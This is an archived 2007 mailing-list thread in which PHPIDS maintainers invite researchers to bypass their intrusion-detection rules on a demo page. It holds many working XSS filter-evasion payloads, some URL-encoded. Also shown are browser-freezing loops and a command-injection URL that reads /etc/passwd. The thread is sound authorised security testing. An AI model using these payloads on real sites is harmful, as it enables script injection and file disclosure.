Pleeeease hack us!


Mario Heiderich

Aug 28, 2007, 3:40:43 PM
to PHPIDS » Web Application Security 2.0
Hi!

After talking to Christian and SirDarckCat I decided to make this post - even if it may sound a little bit provocative ;) We spent lots of time on the rules and, apart from some details, we are pretty content with them.

So if you like and find some time, give them a new try - anyone who manages to create an XSS on the demo page will be mentioned in the next release notes and will (if wanted) get a dedicated interview on the blog (SirDarckCat's interview will appear in the next days - he was again quicker than light with some vectors mentioned in the release post).

Allowed are the following browsers:
- Firefox 1.5+
- IE 6+
- Opera 9+
- Safari 2+
- Konqueror 3.5+

Any vector which is able to create an alert/content change via JS on the demo page counts - as long as a PoC of whatever form can be provided. A similar contest will follow in the next weeks for SQL Injection.

Greetings and have fun!
.mario

Giorgio Maone

Sep 4, 2007, 11:02:01 AM
to PHPIDS » Web Application Security 2.0

Mario Heiderich

Sep 4, 2007, 11:10:02 AM
to php...@googlegroups.com
Thanks Giorgio! Very classy ones again. *fixing*




--
_______________________
php-ids.org

Maie...@web.de

Sep 5, 2007, 3:16:18 PM
to PHPIDS » Web Application Security 2.0
Make Giorgio's threesome a foursome.
obj[name]() works as well, giving access to all top level functions/objects.
Low impact in general, but this might be combined with other things...

Mario Heiderich

Sep 5, 2007, 3:33:55 PM
to php...@googlegroups.com
Hi MalerMan and welcome to the group!
Nice variation - I shouldn't have forgotten that ;) *fixed*

Sorry for being late with answers today - I caught a cold and had to dig myself into a project although...

Greetings,
.mario

Gareth

Sep 6, 2007, 5:03:44 AM
to PHPIDS » Web Application Security 2.0
s1=''+"jav"+'';s2=''+"ascri"+'';s3=''+"pt"+'';s4=''==''?':':0;s5=''+"aler"+'';s6=''+"t"+'';s7=''==''?'(1)':0;s8=s1+s2+s3+s4+s5+s6+s7;URL=s8

Told you string concatenation was tough :)


Gareth

Sep 6, 2007, 6:55:43 AM
to PHPIDS » Web Application Security 2.0
This will also work with the window.name trick (on IE only onclick):-

URL=name


Gareth

Sep 6, 2007, 10:48:16 AM
to PHPIDS » Web Application Security 2.0
Now this is a strange one:-
h1=''+'hr'+'';h2=''+'ef'+'';h3=h1+h2;s1=''+'jav'+'';s2=''+'ascri'+'';s3=''+'pt'+'';s4=''==''?':':0;s5=''+'aler'+'';s6=''+'t'+'';s7=''==''?'(1)':0;s8=s1+s2+s3+s4+s5+s6+s7;p1=previousSibling;p1.nextSibling[h3]=s8;

It should work because I tested it locally; however, it doesn't seem to execute on your site. I've no idea why - maybe some characters cause the onclick handler to produce invalid data. The code above gets past your filters though.

Tested this in Firefox locally and it worked:-
<a onclick="h1=''+'hr'+'';h2=''+'ef'+'';h3=h1+h2;s1=''+'jav'+'';s2=''+'ascri'+'';s3=''+'pt'+'';s4=''==''?':':0;s5=''+'aler'+'';s6=''+'t'+'';s7=''==''?'(1)':0;s8=s1+s2+s3+s4+s5+s6+s7;p1=previousSibling;p1.nextSibling[h3]=s8;" href="?test=test">Test</a>

Mario Heiderich

Sep 7, 2007, 11:54:39 AM
to php...@googlegroups.com
Yep - very nice and strange one indeed! But fixed. The concatenation algorithm has received a recode - hope that will stop the next wave ;)

Greetings and thanks!
.mario


Gareth

Sep 7, 2007, 12:30:39 PM
to PHPIDS » Web Application Security 2.0
Cool Mario nice one, I'll look forward to hacking it again :)

I think I might have found 1 vector already


Gareth

Sep 8, 2007, 6:20:48 AM
to PHPIDS » Web Application Security 2.0
s3=1==true&&':';s2=1==true&&'(1)';s1=1==true&&'javascript'+s3+'aler'+'t'+s2;URL=s1

Mario Heiderich

Sep 8, 2007, 9:58:02 AM
to PHPIDS » Web Application Security 2.0
very cool and.. *fixed*

I sent you the questions, Gareth. Next would be Kishor and Giorgio if you guys like to.

Gareth

Sep 8, 2007, 2:43:37 PM
to PHPIDS » Web Application Security 2.0
x=(this);c=1==1&&':';s=''+/javascriptaaalerta(1)ahrefa/+'';j=s[1]+s[2]+s[3]+s[4]+s[5]+s[6]+s[7]+s[8]+s[9]+s[10]+c+s[12]+s[14]+s[15]+s[16]+s[17]+s[19]+s[20]+s[21];h=s[23]+s[24]+s[25]+s[26];x[h]=j


Gareth

Sep 9, 2007, 2:30:36 PM
to PHPIDS » Web Application Security 2.0
c4=1==1&&'(1)';c3=1==1&&'aler';c2=1==1&&':';c1=1==1&&'javascript';a=c1+c2+c3+'t'+c4;
(URL=a);

thornmaker

Sep 9, 2007, 4:06:14 PM
to PHPIDS » Web Application Security 2.0

thornmaker

Sep 10, 2007, 1:19:22 AM
to PHPIDS » Web Application Security 2.0

Mario Heiderich

Sep 10, 2007, 4:16:17 AM
to php...@googlegroups.com
Wow - that's a nice one. I love the trick: regex 1 preparing regex 2 for being in the right format to be executed.


Gareth

Sep 10, 2007, 4:40:26 AM
to PHPIDS » Web Application Security 2.0
Hi All

I've written a simple script to conduct concatenation attacks, so if anyone wants to improve it or add new vectors please do and send them to the group.
The reason I think it is needed is the number of possible combinations; having an automated tool like this would help with unit testing of the code. You never know when a vector could creep back in, you see.

Tool available here:-
www.businessinfo.co.uk/labs/phpids/phpids.php.zip

On Sep 10, 9:16 am, "Mario Heiderich" <mario.heider...@googlemail.com> wrote:

> Wow - that's a nice one. I love the trick regex 1 preparing regex 2 for being in the right format to be executed.
>
> 2007/9/10, thornmaker <thornma...@gmail.com>:
> > here's another one using the "exec" function for regular expressions to extract the strings to execute:
> > http://demo.php-ids.org/?test=%64%3D%27%27%2B%2F%65%76%61%6C%7E%6C%6F...

Gareth

Sep 10, 2007, 7:15:51 AM
to PHPIDS » Web Application Security 2.0
Another thing I've thought about is Javascript based XSS protection, I
don't know if this is outside the projects goal but something like
this would prevent window.name exploits:-

<script type="text/javascript">window.name=''</script>

Which the PHPIDS could include in the header of the page.

Mario Heiderich

Sep 10, 2007, 7:24:54 AM
to php...@googlegroups.com
It's a good idea but it's way outside the project - the IDS will provide no protection - just monitoring and information on possible attacks. I had the PHPIPS idea in my head too for some time but there are so many other tools and ways to solve that...


thornmaker

Sep 10, 2007, 9:45:43 AM
to PHPIDS » Web Application Security 2.0
so here's a similar one, but it eliminates the regexps... just pulls the chars from the ''+/asdf/ directly.
http://demo.php-ids.org/?test=%78%3D%27%27%2B%2F%61%62%63%64%65%66%67%68%69%6A%6B%6C%6D%6E%6F%70%71%72%73%74%75%76%77%78%79%7A%2E%28%31%29%2F%3B%65%3D%78%5B%35%5D%3B%76%3D%78%5B%32%32%5D%3B%61%3D%78%5B%31%5D%3B%6C%3D%78%5B%31%32%5D%3B%6F%3D%78%5B%31%35%5D%3B%63%3D%78%5B%33%5D%3B%74%3D%78%5B%32%30%5D%3B%69%3D%78%5B%39%5D%3B%6E%3D%78%5B%31%34%5D%3B%68%3D%78%5B%38%5D%3B%73%3D%78%5B%31%39%5D%3B%75%3D%78%5B%32%31%5D%3B%62%3D%78%5B%32%5D%3B%72%3D%78%5B%31%38%5D%3B%67%3D%78%5B%37%5D%3B%64%6F%74%3D%78%5B%32%37%5D%3B%75%6E%6F%3D%78%5B%32%39%5D%3B%6F%70%3D%78%5B%32%38%5D%3B%63%70%3D%78%5B%33%30%5D%3B%7A%3D%65%2B%76%2B%61%2B%6C%3B%79%3D%6C%2B%6F%2B%63%2B%61%2B%74%2B%69%2B%6F%2B%6E%2B%64%6F%74%2B%68%2B%61%2B%73%2B%68%2B%64%6F%74%2B%73%2B%75%2B%62%2B%73%2B%74%2B%72%2B%69%2B%6E%2B%67%2B%6F%70%2B%75%6E%6F%2B%63%70%3B%30%5B%27%27%2B%5B%7A%5D%5D%28%30%5B%27%27%2B%28%7A%29%5D%28%79%29%29%3B#alert%280%29

Mario: do you prefer these posted here or at sla.ckers or both?



Mario Heiderich

Sep 10, 2007, 10:03:32 AM
to php...@googlegroups.com
Wow - I am impressed again ;) I'd prefer both variants of publishing if you don't mind. Great work, thornmaker!

Greetings,
.mario


xorrer

Sep 10, 2007, 5:49:47 PM
to PHPIDS » Web Application Security 2.0
A few of my findings.

A redirect to google.

http://demo.php-ids.org?test=%78%3D%27%27%2B%2F%68%77%74%2E%70%67%6F%3A%6C%65%2E%63%6D%2F%3B%68%3D%78%5B%30%2B%31%5D%3B%74%3D%78%5B%32%2B%31%5D%3B%70%3D%78%5B%34%2B%31%5D%3B%64%3D%78%5B%37%2B%31%5D%3B%73%3D%78%5B%31%2D%31%5D%3B%77%3D%78%5B%31%2B%31%5D%3B%70%31%3D%78%5B%33%2B%31%5D%3B%67%3D%78%5B%35%2B%31%5D%3B%6F%3D%78%5B%36%2B%31%5D%3B%6C%3D%78%5B%38%2B%31%5D%3B%65%3D%78%5B%39%2B%31%5D%3B%63%3D%78%5B%31%31%2B%31%5D%3B%6F%3D%78%5B%36%2B%31%5D%3B%6D%3D%78%5B%31%32%2B%31%5D%3B%75%3D%68%2B%74%2B%74%2B%70%2B%64%2B%73%2B%73%2B%77%2B%77%2B%77%2B%70%31%2B%67%2B%6F%2B%6F%2B%67%2B%6C%2B%65%2B%70%31%2B%63%2B%6F%2B%6D%2B%73%3B%6E%61%76%69%67%61%74%65%28%75%29%3B

If you enter this http://demo.php-ids.org?test=%63%6C%6F%73%65%28%29%3B the site opens and immediately closes (close()).

The following two lock up the browser with 100% CPU activity.

http://demo.php-ids.org?test=%66%6F%72%28%69%3D%31%3B%69%3C%4E%75%6D%62%65%72%2E%4D%41%58%5F%56%41%4C%55%45%3B%2B%2B%69%29%7B%31%7D
http://demo.php-ids.org?test=%77%68%69%6C%65%28%31%29%7B%31%7D

This is an Opera-specific thing which you could use to spam up the "error console" using an endless loop: opera.postError(1);


Mario Heiderich

Sep 10, 2007, 6:10:52 PM
to PHPIDS » Web Application Security 2.0
Hi xorrer and welcome!

Nice stuff - I didn't know about the opera specific JS - is there a
link to inform about that stuff?

Needless to say that the rules are *fixed* ;)

Thanks man!
.mario


thornmaker

Sep 10, 2007, 10:23:24 PM
to PHPIDS » Web Application Security 2.0

Andrei Savu

Sep 11, 2007, 5:03:09 AM
to php...@googlegroups.com
All this is simply unbelievable. I am starting to think that this is an endless battle.

As I can see, PHP IDS will help to make your website more secure, but your security problems will not end here; you will still need very good input filtering and output escaping. Personally I don't think this kind of blacklist filtering is the answer to this security problem.

I think that PHP IDS will give only a fake feeling of security. I am sure that it will always be possible to find a new attack vector that is not already detected.

I will use PHP IDS because I am sure my scripts are not perfect and somewhere there is a path that is not protected enough, and someday someone will find it. By using PHP IDS I hope I will limit most attacks, but I still consider that good input filtering and output escaping is the only real solution.

I am amazed at how many ways there are of injecting JavaScript into a page.

--
'Discipline is the bridge between goals and accomplishments.' -Jim Rohn
"Set your goals high, and don't stop till you get there." Bo Jackson

Gareth

Sep 11, 2007, 6:08:06 AM
to PHPIDS » Web Application Security 2.0
Check this one:-
_=alert,1,1,_(1);

Muhahahahahaha


Mario Heiderich

Sep 11, 2007, 6:21:44 AM
to php...@googlegroups.com
Hi Andrei!


"I think that PHP IDS will give only a fake feeling of security. I am sure that it will always be possible to find a new attack vector that is not already detected."

The PHPIDS shouldn't give you any feeling of security at all - it's no filter and no sanitizing mechanism. As said on the start page, it's able to tell you when someone is trying to attack your site, and how and where he's doing it. So it's a candy layer which definitely doesn't substitute for responsible development. Most people using the PHPIDS use it on high-traffic sites to be able to get some figures to ease risk assessment. The feedback we get from the sites using the PHPIDS is great, and with every release we can cover more attacks with fewer false positives.

And yes - there will be no end regarding possible vectors, and that's what makes the work on the PHPIDS so exciting. I think, and I can speak for myself and others too, that working on the PHPIDS is about learning what is possible, understanding XSS, SQL Injection etc. in great detail and widening one's scope of what is possible today when talking about webapp security. It's definitely a 2.0 thing too (man, I hate that term *g*) because we gather knowledge from people all over the world in this place, and everybody who has information or time to contribute is more than welcome ;)

I hope my little prayer didn't sound too pathetic, but I just wanted to make sure what the PHPIDS is and what it's not. And yes - we will continue working on the patterns even if we all know that there will be no resulting software which is 100% bulletproof.


Greetings,
.mario



xorrer

Sep 11, 2007, 6:30:40 AM
to PHPIDS » Web Application Security 2.0
On 11 Sep., 00:10, Mario Heiderich <Mario.Heider...@googlemail.com>
wrote:

> Nice stuff - I didn't know about the opera specific JS - is there a
> link to inform about that stuff?

Well the only real source I know of is here
http://www.howtocreate.co.uk/operaStuff/operaObject.html.
And a file once included with earlier opera versions jsconsole.html
(http://people.opera.com/byberg/jsconsole.html,
http://www.scss.com.au/family/andrew/opera/panels/jsconsole/jsconsole.html)

xorrer


Mario Heiderich

Sep 11, 2007, 7:33:22 AM
to php...@googlegroups.com
Thanks xorrer!

@Gareth: This one is evil. damn!


Gareth

Sep 11, 2007, 7:45:58 AM
to PHPIDS » Web Application Security 2.0
:)

Dr Evil strikes again muwhahaahaha

I tried to create the smallest possible vector to see if it was
possible, this is dangerous because you can call functions or assign
functions using this technique. Combine it with string concatenation
and there's pretty much anything you can do.


Mario Heiderich

Sep 11, 2007, 7:59:05 AM
to php...@googlegroups.com
That's indeed DrEvilish - damn - this is working in dozens of combinations...

_=alert, 'a',1;_(1);

_=alert,
1,1;_(1);

_=alert, 1,
1
_(1);

_=alert, 'a',1   ,   _  (1);

Man - it's going to be really hard to find a pattern.


Gareth

Sep 11, 2007, 8:13:26 AM
to PHPIDS » Web Application Security 2.0
Sorry mate :)

It's unbelievable that javascript allows variables to be called just
'_' don't you think lol

I always say building things is a lot harder than breaking them ;)


thornmaker

Sep 11, 2007, 9:53:39 PM
to PHPIDS » Web Application Security 2.0
I like how the error page shows the vector in an input box now... but could you make it a bit wider?

Also... I would like to test some of the path traversal injections but am not sure what would be considered 'passing'. For example... http://demo.php-ids.org/?test=1;cat%20/e*c/p*d will display /etc/passwd in the right context, and you have filters that search for etc and /etc/passwd outright, so I presume PHPIDS _should_ catch such things...

thornmaker

Sep 12, 2007, 3:43:11 AM
to PHPIDS » Web Application Security 2.0

Mario Heiderich

Sep 12, 2007, 4:47:20 PM
to PHPIDS » Web Application Security 2.0
@thornmaker: both of your last ones are fixed now. thanks man!

On Sep 12, 9:43 am, thornmaker <thornma...@gmail.com> wrote:
> http://demo.php-ids.org/?test=%28%7A%3D%53%74%72%69%6E%67%29%26%26%28...

thornmaker

Sep 14, 2007, 12:14:03 AM
to PHPIDS » Web Application Security 2.0

Mario Heiderich

Sep 14, 2007, 4:39:21 AM
to php...@googlegroups.com
This is plain awesome - already commented on that one on slackers. Thanks, thornmaker!!!


thornmaker

Sep 14, 2007, 9:57:10 AM
to PHPIDS » Web Application Security 2.0

Mario Heiderich

Sep 14, 2007, 11:15:31 AM
to php...@googlegroups.com
Yep - I should have put more thought into the rule fixes. Thanks again!


thornmaker

Sep 14, 2007, 7:45:15 PM
to PHPIDS » Web Application Security 2.0
I was looking at Kishor's new vector and when I submitted (a slight variation of it) I got this funny error. I can't reproduce it now, but thought I would mention it. See http://p42.us/php-ids/php-ids-error.png for a screen shot.

Mario Heiderich

Sep 14, 2007, 8:05:20 PM
to php...@googlegroups.com
Hehe - you managed to catch a 15 second window when I uploaded a faulty file ;)


thornmaker

Sep 14, 2007, 10:16:48 PM
to PHPIDS » Web Application Security 2.0
Shortly after that, I realized you were working on it live. First it was blocked by one filter... a few minutes later it was blocked by two :)


thornmaker

Sep 15, 2007, 12:00:51 AM
to PHPIDS » Web Application Security 2.0

xorrer

Sep 15, 2007, 4:19:51 AM
to PHPIDS » Web Application Security 2.0

xorrer

Sep 15, 2007, 6:05:23 AM
to PHPIDS » Web Application Security 2.0

Mario Heiderich

Sep 15, 2007, 6:15:00 AM
to php...@googlegroups.com
Nice one, xorrer! Your first ones I fixed by accident while working on thornmaker's and Kishor's examples, but the second one came unexpected ;) I did a slight modification on the converter to fix it. Thx!


xorrer

Sep 15, 2007, 7:56:50 AM
to PHPIDS » Web Application Security 2.0

Mario Heiderich

Sep 15, 2007, 9:34:08 AM
to php...@googlegroups.com
Well - I think I got it this time ;)

@xorrer: I'd like to add you to the credits page - you want to be mentioned as xorrer or with your full name? You have a website you want to link your name to?


xorrer

Sep 15, 2007, 11:42:28 AM
to PHPIDS » Web Application Security 2.0
@mario

Thanks. You can just list me up as xorrer, no webpage to link to.

On Sep 15, 3:34 pm, "Mario Heiderich" <mario.heider...@googlemail.com> wrote:

> Well - I think I got it this time ;)
>
> @xorrer: I'd like to add you to the credits page - you want to be mentioned as xorrer or with your full name? You have a website you want to link your name to?
>
> 2007/9/15, xorrer <obhvsbypqg...@gmail.com>:
> > It's still possible
> > http://demo.php-ids.org/?test=%3B%7B%7A%20%3D%28%31%29%3F%22%22%3A%61...

xorrer

Sep 15, 2007, 12:01:10 PM
to PHPIDS » Web Application Security 2.0

Mario Heiderich

Sep 15, 2007, 12:10:36 PM
to php...@googlegroups.com
Argh - one second after the release ;)


xorrer

Sep 15, 2007, 12:36:28 PM
to PHPIDS » Web Application Security 2.0

Mario Heiderich

Sep 15, 2007, 12:53:10 PM
to php...@googlegroups.com
Well - this issue seems to be way harder to solve than i originally thought.


thornmaker

Sep 15, 2007, 3:00:39 PM
to PHPIDS » Web Application Security 2.0

xorrer

Sep 15, 2007, 5:31:04 PM
to PHPIDS » Web Application Security 2.0
Good stuff thornmaker.

Those ternary ones are tough to prevent.

I have a vector which fails by just one character. But I would like to share it anyway.

http://demo.php-ids.org/?test=%61%3D%5B%27%27%2C%5D%3B%0D%0A%62%3D%5B%61%2B%27%65%76%61%27%2C%5D%3B%63%3D%5B%62%2B%27%6C%27%2C%5D%3B%64%3D%5B%61%2B%27%61%6C%65%72%27%2C%5D%3B%65%3D%5B%64%2B%27%74%28%27%2C%5D%3B%0D%0A%66%3D%5B%65%2B%27%63%25%32%39%27%2C%5D%3B%0D%0A%24%3D%2E%31%5B%63%5D%3B%0D%0A%61%3D%24%3B%0D%0A%61%28%66%29

If you remove the closing bracket, it passes the IDS, but then the eval won't work.

And with my setup there is no way to escape this regex _START_,.+=.+(\?|,).*\)_END_ or am I wrong?

On Sep 15, 9:00 pm, thornmaker <thornma...@gmail.com> wrote:
> nice work xorrer!
>
> here's another ternary one to add to the mix: http://demo.php-ids.org/?test=%7A%3D%2F%7A%2F%21%3D%2F%7A%2F%3F%27%27...

xorrer

Sep 15, 2007, 8:44:07 PM